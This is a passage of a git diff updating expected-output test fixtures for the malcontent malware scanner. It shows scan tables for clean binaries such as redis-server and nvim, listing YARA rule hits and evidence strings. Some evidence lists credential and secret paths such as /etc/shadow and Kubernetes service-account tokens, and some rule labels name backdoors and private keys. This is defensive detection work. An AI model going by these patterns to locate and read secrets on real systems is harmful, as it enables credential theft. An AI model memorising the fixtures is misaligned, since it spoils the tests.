[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/local/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-local-address.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvfrom](https://github.com/search?q=recvfrom&type=code)
[recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/udp/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp-receive.yara#udp_listen) | Listens for UDP responses | [ReadFromUDP](https://github.com/search?q=ReadFromUDP&type=code)
[listenUDP](https://github.com/search?q=listenUDP&type=code) | +| LOW | [net/udp/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp-send.yara#udp_send) | Sends UDP packets | [DialUDP](https://github.com/search?q=DialUDP&type=code)
[WriteMsgUDP](https://github.com/search?q=WriteMsgUDP&type=code) | +| LOW | [net/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url.yara#url_handle) | Handles URL strings | [RequestURI](https://github.com/search?q=RequestURI&type=code) | +| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd](https://github.com/search?q=cd&type=code) | +| LOW | [process/groupid/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real, effective, and saved group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | +| LOW | [process/groups/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [process/namespace/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/namespace-set.yara#setns) | associate thread or process with a namespace | [setns](https://github.com/search?q=setns&type=code) | +| LOW | [process/userid/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | +| LOW | [ref/path/bin/su](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/bin-su.yara#bin_su) | Calls /bin/su | [/bin/su](https://github.com/search?q=%2Fbin%2Fsu&type=code) | +| LOW | [ref/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc.yara#etc_path) | path reference within /etc | [/etc/apache/mime.typeshpack](https://github.com/search?q=%2Fetc%2Fapache%2Fmime.typeshpack&type=code)
[/etc/centos-release/etc/debian](https://github.com/search?q=%2Fetc%2Fcentos-release%2Fetc%2Fdebian&type=code)
[/etc/crio/crio.conf.d/](https://github.com/search?q=%2Fetc%2Fcrio%2Fcrio.conf.d%2F&type=code)
[/etc/crio/crio.conf/run/containerd/co](https://github.com/search?q=%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fcontainerd%2Fco&type=code)
[/etc/groupmemory.max](https://github.com/search?q=%2Fetc%2Fgroupmemory.max&type=code)
[/etc/hostnamecri](https://github.com/search?q=%2Fetc%2Fhostnamecri&type=code)
[/etc/hostnameusr/lib/os-releaseetc/ce](https://github.com/search?q=%2Fetc%2Fhostnameusr%2Flib%2Fos-releaseetc%2Fce&type=code)
[/etc/hostsrt](https://github.com/search?q=%2Fetc%2Fhostsrt&type=code)
[/etc/httpd/conf/mime.typesid](https://github.com/search?q=%2Fetc%2Fhttpd%2Fconf%2Fmime.typesid&type=code)
[/etc/localtime](https://github.com/search?q=%2Fetc%2Flocaltime&type=code)
[/etc/login.defs/proc/](https://github.com/search?q=%2Fetc%2Flogin.defs%2Fproc%2F&type=code)
[/etc/mime.types](https://github.com/search?q=%2Fetc%2Fmime.types&type=code)
[/etc/mtablowerdir](https://github.com/search?q=%2Fetc%2Fmtablowerdir&type=code)
[/etc/neuvector/certs/internal/ca.cert](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fca.cert&type=code)
[/etc/neuvector/certs/internal/cert.ke](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fcert.ke&type=code)
[/etc/neuvector/certs/internal/cert.pe](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fcert.pe&type=code)
[/etc/neuvector/certs/internalcom.dock](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternalcom.dock&type=code)
[/etc/nsswitch.confinvalid](https://github.com/search?q=%2Fetc%2Fnsswitch.confinvalid&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/passwd/etc/shadow](https://github.com/search?q=%2Fetc%2Fpasswd%2Fetc%2Fshadow&type=code)
[/etc/pki/ca-trust/extracted/pem/tls-c](https://github.com/search?q=%2Fetc%2Fpki%2Fca-trust%2Fextracted%2Fpem%2Ftls-c&type=code)
[/etc/pki/tls/cacert.peminvalid](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcacert.peminvalid&type=code)
[/etc/pki/tls/certs/ca-bundle.crtx](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcerts%2Fca-bundle.crtx&type=code)
[/etc/protocolsunknown](https://github.com/search?q=%2Fetc%2Fprotocolsunknown&type=code)
[/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code)
[/etc/services](https://github.com/search?q=%2Fetc%2Fservices&type=code)
[/etc/shellssubmissionsnil](https://github.com/search?q=%2Fetc%2Fshellssubmissionsnil&type=code)
[/etc/ssl/ca-bundle.pemx](https://github.com/search?q=%2Fetc%2Fssl%2Fca-bundle.pemx&type=code)
[/etc/ssl/cert.peminvalid](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.peminvalid&type=code)
[/etc/ssl/certs/ca-certificates.crtadd](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2Fca-certificates.crtadd&type=code)
[/etc/subgid](https://github.com/search?q=%2Fetc%2Fsubgid&type=code)
[/etc/subuid](https://github.com/search?q=%2Fetc%2Fsubuid&type=code)
[/etc/sysconfig/clock/](https://github.com/search?q=%2Fetc%2Fsysconfig%2Fclock%2F&type=code)
[/etc/timezone/dev/.udev/db](https://github.com/search?q=%2Fetc%2Ftimezone%2Fdev%2F.udev%2Fdb&type=code)
[/etc/zoneinfoparsing](https://github.com/search?q=%2Fetc%2Fzoneinfoparsing&type=code) | +| LOW | [ref/path/etc/resolv.conf](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc-resolv.conf.yara#etc_resolv_conf) | accesses DNS resolver configuration | [/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code) | +| LOW | [ref/path/usr/bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/calico-nodePROC](https://github.com/search?q=%2Fusr%2Fbin%2Fcalico-nodePROC&type=code)
[/usr/bin/csp-billing-adapterio.kubernetes.container.namecannot](https://github.com/search?q=%2Fusr%2Fbin%2Fcsp-billing-adapterio.kubernetes.container.namecannot&type=code)
[/usr/bin/getconf/usr/bin/timeoutcontext](https://github.com/search?q=%2Fusr%2Fbin%2Fgetconf%2Fusr%2Fbin%2Ftimeoutcontext&type=code)
[/usr/bin/getentduplicated](https://github.com/search?q=%2Fusr%2Fbin%2Fgetentduplicated&type=code)
[/usr/bin/jqsupervisord.WithCancelgrpc.Servershort](https://github.com/search?q=%2Fusr%2Fbin%2Fjqsupervisord.WithCancelgrpc.Servershort&type=code)
[/usr/bin/lsof/usr/bin/curliptables-savegraceful_stop](https://github.com/search?q=%2Fusr%2Fbin%2Flsof%2Fusr%2Fbin%2Fcurliptables-savegraceful_stop&type=code)
[/usr/bin/pod/sbin/sysctl/usr/bin/topconfigure.shcontext.TODOcontent-type/](https://github.com/search?q=%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcontent-type%2F&type=code)
[/usr/bin/supervisordAdd](https://github.com/search?q=%2Fusr%2Fbin%2FsupervisordAdd&type=code)
[/usr/bin/tee/usr/bin/pod/sbin/sysctl/usr/bin/topconfigure.shcontext.TODOc](https://github.com/search?q=%2Fusr%2Fbin%2Ftee%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOc&type=code)
[/usr/bin/topconfigure.shcontext.TODOcontent-type/dev/urandomshort](https://github.com/search?q=%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcontent-type%2Fdev%2Furandomshort&type=code)
[/usr/bin/uname/usr/bin/iconvPROC](https://github.com/search?q=%2Fusr%2Fbin%2Funame%2Fusr%2Fbin%2FiconvPROC&type=code) | +| LOW | [ref/path/usr/sbin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-sbin.yara#usr_sbin_path) | path reference within /usr/sbin | [/usr/sbin/ethtool/usr/local/bin/dpexiting](https://github.com/search?q=%2Fusr%2Fsbin%2Fethtool%2Fusr%2Flocal%2Fbin%2Fdpexiting&type=code) | +| LOW | [ref/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var.yara#var_path) | path reference within /var | [/var//sbinpInfo/rootSwarmD.2.5D.2.7D.3.1D.3.2D.3.3D.3.4D.3.5D.3.6D.3.](https://github.com/search?q=%2Fvar%2F%2FsbinpInfo%2FrootSwarmD.2.5D.2.7D.3.1D.3.2D.3.3D.3.4D.3.5D.3.6D.3.&type=code)
[/var/lib/docker/aufs/diffno](https://github.com/search?q=%2Fvar%2Flib%2Fdocker%2Faufs%2Fdiffno&type=code)
[/var/lib/rpm/Packages/lib/apk/db/installedFMON](https://github.com/search?q=%2Fvar%2Flib%2Frpm%2FPackages%2Flib%2Fapk%2Fdb%2FinstalledFMON&type=code)
[/var/nv_debug/pcap/controller](https://github.com/search?q=%2Fvar%2Fnv_debug%2Fpcap%2Fcontroller&type=code)
[/var/nv_debug/profileCannot](https://github.com/search?q=%2Fvar%2Fnv_debug%2FprofileCannot&type=code)
[/var/nv_debug/snapshotNeuVectorPolicyVersionGRP](https://github.com/search?q=%2Fvar%2Fnv_debug%2FsnapshotNeuVectorPolicyVersionGRP&type=code)
[/var/run/cri-dockerd.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcri-dockerd.sockFile&type=code)
[/var/run/crio/crio.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2Fcrio.sockFile&type=code)
[/var/run/docker.sock/var/lib/dpkg/statusFile](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2Fvar%2Flib%2Fdpkg%2FstatusFile&type=code)
[/var/run/dockershim.sock/var/lib/rpm/Packages.dbFMON](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2Fvar%2Flib%2Frpm%2FPackages.dbFMON&type=code)
[/var/run/openvswitch/Error](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2FError&type=code)
[/var/run/openvswitch/db.sockNotify](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2Fdb.sockNotify&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/ca.crtk8s.io.apimachine](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Fca.crtk8s.io.apimachine&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/namespaceproto](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Fnamespaceproto&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/tokenk8s.io.apimachiner](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftokenk8s.io.apimachiner&type=code)
[/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | +| LOW | [ref/site/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url) | contains embedded HTTPS URLs | [https://bugs.centos.org/](https://bugs.centos.org/)
[https://docker.io/](https://docker.io/)
[https://finishedmemLimitplatform](https://finishedmemLimitplatform)
[https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv](https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv)
[https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md](https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md)
[https://golang.org/pkg/unicode/](https://golang.org/pkg/unicode/)
[https://index.docker.io/json](https://index.docker.io/json)
[https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o](https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o)
[https://kubernetes.default/version/openshiftproto](https://kubernetes.default/version/openshiftproto)
[https://kubernetes.default/versionproto](https://kubernetes.default/versionproto)
[https://kubernetes.io/docs/reference/using-api/api-concepts/](https://kubernetes.io/docs/reference/using-api/api-concepts/)
[https://protobuf.dev/reference/go/faq](https://protobuf.dev/reference/go/faq)
[https://registry-1.docker.io/bufio.Scanner](https://registry-1.docker.io/bufio.Scanner)
[https://registry.hub.docker.com/Failed](https://registry.hub.docker.com/Failed)
[https://www.centos.org/](https://www.centos.org/)
[https://www.iana.org/assignments/service-names-port-numbers/service-names](https://www.iana.org/assignments/service-names-port-numbers/service-names) | +| LOW | [ref/words/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/password.yara#password) | references a 'password' | [GetPassword](https://github.com/search?q=GetPassword&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[UserPassword](https://github.com/search?q=UserPassword&type=code)
[d for field Passwordruntime](https://github.com/search?q=d+for+field+Passwordruntime&type=code)
[no passwords used](https://github.com/search?q=no+passwords+used&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[vpasswordoffsets](https://github.com/search?q=vpasswordoffsets&type=code) | +| LOW | [ref/words/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/plugin.yara#plugin) | references a 'plugin' | [PluginPidns](https://github.com/search?q=PluginPidns&type=code)
[Plugincontainerd](https://github.com/search?q=Plugincontainerd&type=code)
[PluginsRequest](https://github.com/search?q=PluginsRequest&type=code)
[PluginsResponseproto](https://github.com/search?q=PluginsResponseproto&type=code)
[Plugins_Handler](https://github.com/search?q=Plugins_Handler&type=code)
[Pluginscontainerd](https://github.com/search?q=Pluginscontainerd&type=code)
[Pluginsproto](https://github.com/search?q=Pluginsproto&type=code)
[adaptPlugin](https://github.com/search?q=adaptPlugin&type=code)
[getPlugins](https://github.com/search?q=getPlugins&type=code)
[pluginCache](https://github.com/search?q=pluginCache&type=code)
[pluginpath](https://github.com/search?q=pluginpath&type=code)
[pluginsFA](https://github.com/search?q=pluginsFA&type=code)
[pluginsToPB](https://github.com/search?q=pluginsToPB&type=code)
[s plugingithub](https://github.com/search?q=s+plugingithub&type=code)
[vplugin](https://github.com/search?q=vplugin&type=code)
[wplugin](https://github.com/search?q=wplugin&type=code) | +| LOW | [secrets/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/private_key.yara#private_key_val) | References private keys | [privateKey](https://github.com/search?q=privateKey&type=code) | diff --git a/test_data/linux/clean/nvim.simple b/test_data/linux/clean/nvim.simple index 7cc1dfac..1dc6fdd0 100644 --- a/test_data/linux/clean/nvim.simple +++ b/test_data/linux/clean/nvim.simple @@ -1,5 +1,6 @@ # linux/clean/nvim: high 3P/threat_hunting/hrshell: medium +combo/degrader/linux_paths: medium databases/mysql: medium databases/sqlite: medium dylib/symbol/address: medium diff --git a/test_data/linux/clean/pypi_package_index.json.simple b/test_data/linux/clean/pypi_package_index.json.simple index c2f8ba47..a295344f 100644 --- a/test_data/linux/clean/pypi_package_index.json.simple +++ b/test_data/linux/clean/pypi_package_index.json.simple @@ -167,7 +167,6 @@ ref/program/sshd: medium ref/program/sudo: medium ref/site/download: high ref/site/dyndns: medium -ref/words/backdoor: high ref/words/ddos: high ref/words/dropper: medium ref/words/exploit: high diff --git a/test_data/linux/clean/redis-server.aarch64.md b/test_data/linux/clean/redis-server.aarch64.md index 93d52c21..7ad499ab 100644 --- a/test_data/linux/clean/redis-server.aarch64.md +++ b/test_data/linux/clean/redis-server.aarch64.md @@ -1,50 +1,50 @@ -## linux/clean/redis-server.aarch64 [⚠️ MEDIUM] +## linux/clean/redis-server.aarch64 [🔥 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|---------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/self/maps](https://github.com/search?q=%2Fproc%2Fself%2Fmaps&type=code)
[/proc/self/oom_score_adj](https://github.com/search?q=%2Fproc%2Fself%2Foom_score_adj&type=code)
[/proc/self/smaps](https://github.com/search?q=%2Fproc%2Fself%2Fsmaps&type=code)
[/proc/self/stat](https://github.com/search?q=%2Fproc%2Fself%2Fstat&type=code)
[/proc/sys/net/core/somaxconn](https://github.com/search?q=%2Fproc%2Fsys%2Fnet%2Fcore%2Fsomaxconn&type=code)
[/proc/sys/vm/overcommit_memory](https://github.com/search?q=%2Fproc%2Fsys%2Fvm%2Fovercommit_memory&type=code)
[/sys/devices/system/clocksource/clocksource0](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0&type=code)
[/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code)
[/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[sysctl.](https://github.com/search?q=sysctl.&type=code) | -| MEDIUM | [dylib/symbol/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell_echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell_echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | -| MEDIUM | [fs/file/times/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | -| MEDIUM | [process/name/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [process/username/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [procfs/arbitrary/pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [ref/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | -| MEDIUM | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | -| MEDIUM | [ref/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | -| MEDIUM | [ref/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | -| MEDIUM | [ref/words/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| MEDIUM | [ref/words/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| LOW | [dylib/address/check](https://github.com/chainguard-dev/malcontent/blob/main/rules/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | -| LOW | [env/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlink](https://github.com/search?q=unlink&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | -| LOW | [fs/lock/update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/tempfile/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [kernel/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [net/hostport/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/local/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-local-address.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
